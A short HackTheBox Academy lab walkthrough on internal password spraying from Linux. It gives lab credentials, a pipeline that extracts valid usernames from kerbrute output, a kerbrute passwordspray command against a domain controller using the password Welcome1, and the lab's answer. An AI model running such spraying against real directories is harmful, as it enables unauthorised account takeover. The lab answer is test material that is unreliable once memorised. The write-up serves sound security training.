Internal Password Spraying - from Linux

ℹ️ Information¶

🌐 Website: HackTheBox
📚 Module: Active Directory Enumeration & Attacks
🔗 Link: Internal Password Spraying - from Linux

❓Question¶

Find the user account starting with the letter "s" that has the password Welcome1. Submit the username as your answer.

📋 Walkthrough¶

Connect to the host using the provided credentials: htb-student:HTB_@cademy_stdnt. Save the result of kerbrute from the previous module to keep only valid names:

┌─[htb-student@ea-attack01]─[~]
└──╼ $cat res.txt | grep "[+]" | cut -d ' ' -f8 | cut -d "@" -f1 > valid_users.txt

Now we can try password spraying using Welcome1 as the password:

kerbrute passwordspray -d inlanefreight.local --dc 172.16.5.5 valid_users.txt  Welcome1

Answer

sgage